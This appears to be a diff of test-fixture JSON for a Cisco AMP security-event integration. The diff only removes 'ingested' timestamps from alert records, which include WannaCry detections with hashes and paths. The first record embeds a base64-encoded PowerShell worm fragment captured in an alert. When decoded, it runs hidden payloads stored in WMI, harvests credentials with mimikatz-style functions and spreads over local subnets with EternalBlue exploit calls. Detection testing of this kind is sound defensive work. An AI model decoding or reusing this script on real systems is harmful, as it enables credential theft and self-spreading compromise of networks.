AgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", "severity": 2 @@ -2673,7 +2642,6 @@ ], "code": "2164260893", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376890869Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -2749,7 +2717,6 @@ ], "code": "2164260893", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376891835Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -2825,7 +2792,6 @@ ], "code": "2164260893", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376892845Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -2901,7 +2867,6 @@ ], "code": "2164260893", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376894054Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -2975,7 +2940,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376895061Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -3055,7 +3019,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376896078Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -3135,7 +3098,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376897058Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -3215,7 +3177,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376898029Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 3 @@ -3295,7 +3256,6 @@ ], "code": "553648147", "id": "6419247189909832000", - "ingested": "2022-02-02T05:53:05.376899011Z", "kind": "alert", "original": 